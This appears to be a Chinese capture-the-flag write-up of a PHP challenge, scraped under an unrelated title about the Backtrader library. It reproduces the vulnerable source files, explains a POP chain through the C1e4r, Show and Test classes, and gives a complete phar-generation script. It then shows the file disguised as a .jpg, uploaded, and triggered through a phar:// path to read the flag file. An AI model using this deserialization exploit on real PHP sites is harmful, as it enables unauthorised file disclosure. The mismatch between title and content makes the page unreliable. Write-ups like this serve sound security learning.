Backtrader中文筆記之Fillers
阿新 • • 發佈:2020-09-21
- phar反序列化
- pop鏈構造
可以看到,有file引數,猜測可能存在任意檔案讀取
依次讀取
index.php
<?php
header("content-type:text/html;charset=utf-8");
include 'base.php';
?>
base.php
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>web3</title> <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> </head> <body> <nav class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="index.php">首頁</a> </div> <ul class="nav navbar-nav navbra-toggle"> <li class="active"><a href="file.php?file=">檢視檔案</a></li> <li><a href="upload_file.php">上傳檔案</a></li> </ul> <ul class="nav navbar-nav navbar-right"> <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> </ul> </div> </nav> </body> </html> <!--flag is in f1ag.php-->
upload_file.php
<?php include 'function.php'; upload_file(); ?> <html> <head> <meta charest="utf-8"> <title>檔案上傳</title> </head> <body> <div align = "center"> <h1>前端寫得很low,請各位師傅見諒!</h1> </div> <style> p{ margin:0 auto} </style> <div> <form action="upload_file.php" method="post" enctype="multipart/form-data"> <label for="file">檔名:</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="提交"> </div> </script> </body> </html>
function.php
<?php //show_source(__FILE__); include "base.php"; header("Content-type: text/html;charset=utf-8"); error_reporting(0); function upload_file_do() { global $_FILES; $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; //mkdir("upload",0777); if(file_exists("upload/" . $filename)) { unlink($filename); } move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); echo '<script type="text/javascript">alert("上傳成功!");</script>'; } function upload_file() { global $_FILES; if(upload_file_check()) { upload_file_do(); } } function upload_file_check() { global $_FILES; $allowed_types = array("gif","jpeg","jpg","png"); $temp = explode(".",$_FILES["file"]["name"]); $extension = end($temp); if(empty($extension)) { //echo "<h4>請選擇上傳的檔案:" . "<h4/>"; } else{ if(in_array($extension,$allowed_types)) { return true; } else { echo '<script type="text/javascript">alert("Invalid file!");</script>'; return false; } } } ?>
file.php
<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
ini_set('open_basedir','/var/www/html/');
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
echo "<h2>There is no file to show!<h2/>";
}
$show = new Show();
if(file_exists($file)) {
$show->source = $file;
$show->_show();
} else if (!empty($file)){
die('file doesn\'t exists.');
}
?>
class.php
<?php
class C1e4r
{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}
class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file; //$this->source = phar://phar.jpg
echo $this->source;
}
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
return $this->get($key);
}
public function get($key)
{
if(isset($this->params[$key])) {
$value = $this->params[$key];
} else {
$value = "index.php";
}
return $this->file_get($value);
}
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
}
?>
Test類
new Test() -> params[] -> __get($key) 訪問不存在或不可訪問屬性時觸發 -> get($key)
-> params[$key]= '/var/www/html/f1ag.php'; -> file_get('/var/www/html/f1ag.php') -> return
Show類
存在__toString()方法,$a = new show(); echo $a;時候呼叫
source屬性在Test類中不存在,讓Test類訪問這個屬性即可呼叫__get()方法
C1e4r類
存在echo $this->test;
$a = new Show();
$b = new C1e4r($a);
最後生成phar檔案
<?php
class C1e4r
{
public $test;
public $str;
}
class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params;
}
$test = new Test();
$test->params['source'] = '/var/www/html/f1ag.php';//file.php檔案中給出絕對路徑
$show = new Show();
$show->str['str'] = $test;
$c1e4r = new C1e4r();
$c1e4r->str = $show;
$phar = new Phar("exp.phar"); //.phar檔案
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); //固定的
$phar->setMetadata($c1e4r); //觸發的頭是C1e4r類,所以傳入C1e4r物件
$phar->addFromString("exp.txt", "test"); //隨便寫點什麼生成個簽名
$phar->stopBuffering();
?>
因upload_file.php做了白名單限制,故將exp.phar檔案改成exp.jpg檔案上傳
訪問upload目錄,發現可直接讀取檔案
上傳之後,確定檔名,進行讀取
file.php?file=phar://upload/234c26003f1b29dee60153f4039eea59.jpg
參考
https://www.cnblogs.com/h3zh1/p/12712426.html